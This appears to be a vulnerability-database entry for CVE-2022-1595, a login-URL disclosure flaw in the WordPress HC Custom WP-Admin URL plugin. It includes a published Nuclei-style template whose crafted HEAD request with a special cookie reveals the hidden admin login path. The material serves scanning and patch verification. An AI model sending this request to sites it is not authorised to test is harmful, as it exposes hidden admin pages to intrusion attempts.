CVE-2022-1595: WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure

日期: 2025-08-01 | 影响软件: WordPress HC Custom WP-Admin URL | POC: 已公开

漏洞描述

The HC Custom WP-Admin URL WordPress plugin through 1.4 leaks the secret login URL when sending a specific crafted request

PoC代码[已公开]

id: CVE-2022-1595

info:
  name: WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure
  author: theamanrawat,oleveloper
  severity: medium
  description: |
    The HC Custom WP-Admin URL WordPress plugin through 1.4 leaks the secret login URL when sending a specific crafted request
  remediation: |
    Update to the latest version of WordPress HC Custom WP-Admin URL plugin (>=1.5) to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/0218c90c-8f79-4f37-9a6f-60cf2f47d47b
    - https://wordpress.org/plugins/hc-custom-wp-admin-url/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1595
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-1595
    cwe-id: CWE-200
    epss-score: 0.15598
    epss-percentile: 0.94454
    cpe: cpe:2.3:a:hc_custom_wp-admin_url_project:hc_custom_wp-admin_url:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
  tags: cve,cve2022,unauth,wpscan,wordpress,wp-plugin,wp,hc-custom-wp-admin-url

http:
  - raw:
      - |
        HEAD /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: valid_login_slug=1

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - "(?i)Set-Cookie:.*wordpress_logged_in_"

      - type: regex
        part: header
        regex:
          - "(?i)Location:.*(/wp-admin/|/[^/]+/wp-login\\.php)"

      - type: status
        status:
          - 302
# digest: 4a0a00473045022019e62963d50f2402ace2f2332acac52422c4d1d641a03284e7ee1e673778a741022100cf67609538054db84b7bd6ba0c4443687cc7204f4b100d36cca51fd93f6fbb89:922c64590222798bb761d5b6d8e72950